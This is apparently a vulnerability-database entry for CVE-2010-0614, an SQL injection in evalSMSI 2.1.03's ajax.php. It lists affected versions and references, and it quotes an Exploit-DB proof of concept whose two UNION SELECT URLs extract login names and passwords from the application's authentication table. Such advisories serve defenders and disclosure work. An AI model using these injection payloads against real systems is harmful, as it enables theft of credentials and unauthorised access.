CVE-2010-0614
Description
SQL injection vulnerability in ajax.php in evalSMSI 2.1.03 allows remote attackers to execute arbitrary SQL commands via the query parameter in the (1) question action, and possibly the (2) sub_par or (3) num_quest actions.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
evalSMSI 2.1.3 - Multiple Input Validation Vulnerabilities
source: https://www.securityfocus.com/bid/38116/info
evalSMSI is prone to multiple vulnerabilities, including an authentication-bypass issue, an SQL-Injection issue, and an HTML-Injection issue.
Attackers can exploit these issues to gain administrative access to the affected application, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible.
Versions prior to evalSMSI 2.2.00 are vulnerable.
http://www.example.com/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20login,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22
http://www.example.com/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20password,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22 Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| myshell | evalsmsi | 2.1.03 | |
References
- http://packetstormsecurity.org/1002-exploits/corelan-10-008-evalmsi.txt
- http://secunia.com/advisories/38478
- http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-008-evalmsi-2-1-03-multiple-vulnerabilities/
- http://www.osvdb.org/62177
- http://www.securityfocus.com/archive/1/509370/100/0/threaded
- http://www.securityfocus.com/bid/38116
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56152
- http://packetstormsecurity.org/1002-exploits/corelan-10-008-evalmsi.txt
- http://secunia.com/advisories/38478
- http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-008-evalmsi-2-1-03-multiple-vulnerabilities/
- http://www.osvdb.org/62177
- http://www.securityfocus.com/archive/1/509370/100/0/threaded
- http://www.securityfocus.com/bid/38116
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56152
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.